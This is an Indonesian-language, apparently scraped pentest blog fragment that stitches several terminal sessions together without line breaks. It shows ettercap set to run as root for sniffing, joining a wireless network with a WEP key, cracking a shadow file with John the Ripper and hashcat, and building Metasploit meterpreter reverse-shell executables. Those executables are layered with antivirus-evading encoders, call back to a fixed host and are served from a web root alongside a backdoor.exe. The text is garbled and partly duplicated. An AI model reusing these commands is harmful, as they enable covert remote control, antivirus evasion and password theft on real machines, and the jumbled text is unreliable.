Anda bisa download di sini
Uji keberhasilan script:
Screenshoot
root@revolution:/# su -root@revolution:/# bluetoothd -uroot@revolution:/# nano /usr/local/etc/etter.conf############################################################################# ## ettercap -- etter.conf -- configuration file ## ## Copyright (C) ALoR & NaGA ## ## This program is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## ## $Id: etter.conf,v 1.79 2005/07/07 10:08:55 alor Exp $ ## #############################################################################
[privs]ec_uid = 65534 # nobody is the defaultec_gid = 65534 # nobody is the default############################################################################# ## ettercap -- etter.conf -- configuration file ## ## Copyright (C) ALoR & NaGA ## ## This program is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## ## $Id: etter.conf,v 1.79 2005/07/07 10:08:55 alor Exp $ ## #############################################################################
[privs]ec_uid = 0 # nobody is the defaultec_gid = 0 # nobody is the defaultroot@revolution:/# ettercap -T -q -i wlan0root@blusp10it:~# iwconfigOutputnya kurang lebih seperti ini:root@blusp10it:~# iwconfig wlan0 root@blusp10it:~# iwconfig wlan0 ap [mac-address-access-point]root@blusp10it:~# iwconfig wlan0 essid [nama-access-point]root@blusp10it:~# iwconfig wlan0 s:"[password]"root@blusp10it:~# iwconfig wlan0 s:"superstar"root@blusp10it:~# dhclient wlan0root@blusp10it:~# ifconfig wlan0
root@blusp10it:/pentest/passwords/jtr# ./john --wordlist=[FILE] [SHADOW]root@blusp10it:/pentest/passwords/jtr# ./john --wordlist=/root/cracking-file-shadow/wordlist.lst /root/cracking-file-shadow/shadowroot@blusp10it:/pentest/passwords/hashcat# ./hashcat-cli.bin --hash-mode=500 /root/cracking-file-shadow/shadow /root/cracking-file-shadow/wordlist.lstroot@ASUS:~# cd /opt/metasploit/msf3/root@ASUS:/opt/metasploit/msf3# ./msfencode -hroot@ASUS:/opt/metasploit/msf3# ./msfencode -lroot@ASUS:/opt/metasploit/msf3# /etc/init.d/apache2 startroot@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 X > /var/www/exploit1.exeroot@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -t exe > /var/www/exploit2.exeroot@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 16 -b '\x00\xff' -t exe > /var/www/exploit3.exeroot@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 4 -b -t raw | ./msfencode -e x86/jmp_call_additive -c 4 -t exe > /var/www/exploit4.exeroot@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 4 -b -t raw | ./msfencode -e x86/jmp_call_additive -c 4 -t raw | ./msfencode -e x86/call4_dword_xor -c 4 -t exe > /var/www/exploit5.exeroot@ASUS:/opt/metasploit/msf3# ./vanish.shroot@ASUS:/opt/metasploit/msf3# cd seclabs/ && cp backdoor.exe /var/www/exploit6.exe